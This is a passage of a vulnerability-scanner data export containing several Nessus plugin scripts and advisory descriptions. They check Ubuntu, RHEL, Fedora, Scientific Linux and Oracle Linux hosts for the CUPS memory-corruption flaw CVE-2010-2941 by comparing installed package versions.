(ubuntu_check(osver:\"10.10\", pkgname:\"cups-common\", 
pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"cups-dbg\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"cups-ppdc\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"cupsddk\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcups2\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcups2-dev\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcupscgi1\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcupscgi1-dev\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcupsdriver1\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcupsdriver1-dev\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcupsimage2\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcupsimage2-dev\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcupsmime1\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcupsmime1-dev\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcupsppdc1\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libcupsppdc1-dev\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-bsd / cups-client / cups-common / cups-dbg / cups-ppdc / etc\");\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, 
{"lastseen": "2019-01-16T20:11:22", "bulletinFamily": "scanner", "description": "According to its banner, the version of CUPS installed on the remote\nhost is prior to 1.4.5. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A use-after-free error exists due to improper allocation\n of memory for attribute values with invalid string data\n types. A remote attacker can exploit this, via a crafted\n IPP request, to cause a denial of service condition or\n the execution of arbitrary code. (CVE-2010-2941)\n\n - An overflow condition exists in the PPD compiler due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to dereference already freed\n memory, resulting in the execution of arbitrary code.", "modified": "2019-01-02T00:00:00", "published": "2010-11-30T00:00:00", "id": "CUPS_1_4_5.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50844", "title": "CUPS < 1.4.5 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50844);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/01/02 11:18:37\");\n\n script_cve_id(\"CVE-2010-2941\");\n script_bugtraq_id(44530);\n\n script_name(english:\"CUPS < 1.4.5 Multiple Vulnerabilities\");\n script_summary(english:\"Checks CUPS server version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote print service is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of CUPS installed on the remote\nhost is prior to 1.4.5. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A use-after-free error exists due to improper allocation\n of memory for attribute values with invalid string data\n types. 
A remote attacker can exploit this, via a crafted\n IPP request, to cause a denial of service condition or\n the execution of arbitrary code. (CVE-2010-2941)\n\n - An overflow condition exists in the PPD compiler due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to dereference already freed\n memory, resulting in the execution of arbitrary code.\n\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=624438\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.cups.org/blog/2010-11-11-cups-1.4.5.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to CUPS version 1.4.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/30\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:cups\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"cups_1_3_5.nasl\");\n script_require_keys(\"www/cups\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 631);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:631, embedded:TRUE);\nget_kb_item_or_exit(\"www/\"+port+\"/cups/running\");\n\nversion = get_kb_item_or_exit(\"cups/\"+port+\"/version\");\nsource = get_kb_item_or_exit(\"cups/\"+port+\"/source\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (\n version =~ \"^1\\.([0-3]|4\\.[0-4])($|[^0-9])\" ||\n version =~ \"^1\\.4(rc|b)\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.4.5\\n';\n\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse if (version =~ \"^(1|1\\.4)($|[^0-9.])\") audit(AUDIT_VER_NOT_GRANULAR, \"CUPS\", port, version);\nelse audit(AUDIT_LISTEN_NOT_VULN, \"CUPS\", port, version);\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:14:22", "bulletinFamily": "scanner", "description": "An invalid free flaw was found in the way the CUPS server parsed\nInternet Printing Protocol (IPP) packets. A malicious user able to\nsend IPP requests to the CUPS server could use this flaw to crash the\nCUPS server. 
(CVE-2010-2941)\n\nAfter installing this update, the cupsd daemon will be restarted\nautomatically.", "modified": "2019-01-02T00:00:00", "published": "2012-08-01T00:00:00", "id": "SL_20101110_CUPS_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60888", "title": "Scientific Linux Security Update : cups on SL6.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60888);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/01/02 10:36:43\");\n\n script_cve_id(\"CVE-2010-2941\");\n\n script_name(english:\"Scientific Linux Security Update : cups on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An invalid free flaw was found in the way the CUPS server parsed\nInternet Printing Protocol (IPP) packets. A malicious user able to\nsend IPP requests to the CUPS server could use this flaw to crash the\nCUPS server. 
(CVE-2010-2941)\n\nAfter installing this update, the cupsd daemon will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1103&L=scientific-linux-errata&T=0&P=2832\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1b5ffce5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"cups-1.4.2-35.el6_0.1\")) flag++;\nif (rpm_check(release:\"SL6\", 
reference:\"cups-devel-1.4.2-35.el6_0.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-libs-1.4.2-35.el6_0.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-lpd-1.4.2-35.el6_0.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-php-1.4.2-35.el6_0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:11:21", "bulletinFamily": "scanner", "description": "Updated cups packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe Common UNIX Printing System (CUPS) provides a portable printing\nlayer for UNIX operating systems.\n\nAn invalid free flaw was found in the way the CUPS server parsed\nInternet Printing Protocol (IPP) packets. A malicious user able to\nsend IPP requests to the CUPS server could use this flaw to crash the\nCUPS server. (CVE-2010-2941)\n\nRed Hat would like to thank Emmanuel Bouillon of NATO C3 Agency for\nreporting this issue.\n\nUsers of cups are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
After installing\nthis update, the cupsd daemon will be restarted automatically.", "modified": "2018-11-28T00:00:00", "published": "2010-11-18T00:00:00", "id": "REDHAT-RHSA-2010-0866.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50638", "title": "RHEL 6 : cups (RHSA-2010:0866)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0866. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50638);\n script_version (\"1.13\");\n script_cvs_date(\"Date: 2018/11/28 11:42:05\");\n\n script_cve_id(\"CVE-2010-2941\");\n script_xref(name:\"RHSA\", value:\"2010:0866\");\n\n script_name(english:\"RHEL 6 : cups (RHSA-2010:0866)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated cups packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe Common UNIX Printing System (CUPS) provides a portable printing\nlayer for UNIX operating systems.\n\nAn invalid free flaw was found in the way the CUPS server parsed\nInternet Printing Protocol (IPP) packets. A malicious user able to\nsend IPP requests to the CUPS server could use this flaw to crash the\nCUPS server. 
(CVE-2010-2941)\n\nRed Hat would like to thank Emmanuel Bouillon of NATO C3 Agency for\nreporting this issue.\n\nUsers of cups are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing\nthis update, the cupsd daemon will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2941\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0866\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0866\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"cups-1.4.2-35.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"cups-1.4.2-35.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"cups-1.4.2-35.el6_0.1\")) flag++;\n\n if 
(rpm_check(release:\"RHEL6\", reference:\"cups-debuginfo-1.4.2-35.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"cups-devel-1.4.2-35.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"cups-libs-1.4.2-35.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"cups-lpd-1.4.2-35.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"cups-lpd-1.4.2-35.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"cups-lpd-1.4.2-35.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"cups-php-1.4.2-35.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"cups-php-1.4.2-35.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"cups-php-1.4.2-35.el6_0.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-debuginfo / cups-devel / cups-libs / cups-lpd / etc\");\n }\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:11:20", "bulletinFamily": "scanner", "description": "This update fixes a cupsd memory corruption vulnerability\n(CVE-2010-2941), as well as fixing a crash when the MIME database\ncannot be loaded for any reason.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2018-07-12T00:00:00", "published": "2010-11-17T00:00:00", "id": "FEDORA_2010-17641.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50618", "title": "Fedora 14 : cups-1.4.4-11.fc14 (2010-17641)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-17641.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50618);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/07/12 15:01:51\");\n\n script_cve_id(\"CVE-2010-2941\");\n script_bugtraq_id(44530);\n script_xref(name:\"FEDORA\", value:\"2010-17641\");\n\n script_name(english:\"Fedora 14 : cups-1.4.4-11.fc14 (2010-17641)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a cupsd memory corruption vulnerability\n(CVE-2010-2941), as well as fixing a crash when the MIME database\ncannot be loaded for any reason.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=624438\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-November/050977.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d9e9c6d0\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"cups-1.4.4-11.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups\");\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:16:40", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2010:0866 :\n\nUpdated cups packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. 
A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe Common UNIX Printing System (CUPS) provides a portable printing\nlayer for UNIX operating systems.\n\nAn invalid free flaw was found in the way the CUPS server parsed\nInternet Printing Protocol (IPP) packets. A malicious user able to\nsend IPP requests to the CUPS server could use this flaw to crash the\nCUPS server. (CVE-2010-2941)\n\nRed Hat would like to thank Emmanuel Bouillon of NATO C3 Agency for\nreporting this issue.\n\nUsers of cups are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing\nthis update, the cupsd daemon will be restarted automatically.", "modified": "2018-08-13T00:00:00", "published": "2013-07-12T00:00:00", "id": "ORACLELINUX_ELSA-2010-0866.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=68140", "title": "Oracle Linux 6 : cups (ELSA-2010-0866)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2010:0866 and \n# Oracle Linux Security Advisory ELSA-2010-0866 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68140);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/08/13 14:32:37\");\n\n script_cve_id(\"CVE-2010-2941\");\n script_xref(name:\"RHSA\", value:\"2010:0866\");\n\n script_name(english:\"Oracle Linux 6 : cups (ELSA-2010-0866)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2010:0866 :\n\nUpdated cups packages that fix one security issue are now 
available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe Common UNIX Printing System (CUPS) provides a portable printing\nlayer for UNIX operating systems.\n\nAn invalid free flaw was found in the way the CUPS server parsed\nInternet Printing Protocol (IPP) packets. A malicious user able to\nsend IPP requests to the CUPS server could use this flaw to crash the\nCUPS server. (CVE-2010-2941)\n\nRed Hat would like to thank Emmanuel Bouillon of NATO C3 Agency for\nreporting this issue.\n\nUsers of cups are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing\nthis update, the cupsd daemon will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-February/001838.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) 